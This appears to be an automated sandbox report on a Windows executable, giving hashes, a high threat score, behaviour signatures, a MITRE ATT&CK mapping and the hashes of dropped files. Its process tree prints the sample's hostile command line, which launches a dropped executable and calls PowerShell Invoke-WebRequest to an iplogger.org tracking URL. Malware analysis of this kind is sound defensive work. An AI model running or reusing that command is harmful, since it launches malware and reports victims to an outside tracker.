Overview

overview

10

Static

static

1

d23aaa6690...c7.exe

windows7_x64

10

d23aaa6690...c7.exe

windows10-2004_x64

8

Analysis

  • max time kernel
    7s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    05-02-2022 12:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe

  • Size

    1.8MB

  • MD5

    80286211e348fb262323c664430553f2

  • SHA1

    c9a55f6c23c55d33925635fcee5fb72ad4c3f001

  • SHA256

    d23aaa6690b8141985a4237e4660246f83a59460d1fc7c614ae88eeea9d7fd4a

  • SHA512

    9cbd4b8b5622879180ea23859cd2611c093673231ba1567a2dff0198998861c68eac7cf9a830b498af121c79fe5c06aea67b7dab429af8c3e58b84d1bc42f122

Score
8/10
linkpdf

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

    pdflink
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe
    "C:\Users\Admin\AppData\Local\Temp\d23aaa6690b8141985a4237e4660246f83a59460d1fc7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "PRO3.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
        "PRO3.exe"
        3⤵
        • Executes dropped EXE
        PID:700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
        3⤵
          PID:2548

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\PRO3.exe
      MD5

      aeb230e71336c19457a6e3443fe1ef8e

      SHA1

      552884c4e035b011b01bb244679f06b6e95d4980

      SHA256

      ad1c4836f2ab049f7ed8f3dd43947d197498f92303307bdcbab2d9b52a20188a

      SHA512

      94a75af2a58d91a4c15556f51f8c132e57d29a2005140876accfe0fbaaecaef851c618e0c0f31d035eb0b0a5d8e27d0844b0e7d2278cfb3efa593badfee60914

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\nsl4218.tmp\M17UDIQ8KE.dll
      MD5

      293165db1e46070410b4209519e67494

      SHA1

      777b96a4f74b6c34d43a4e7c7e656757d1c97f01

      SHA256

      49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

      SHA512

      97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

      Download Submit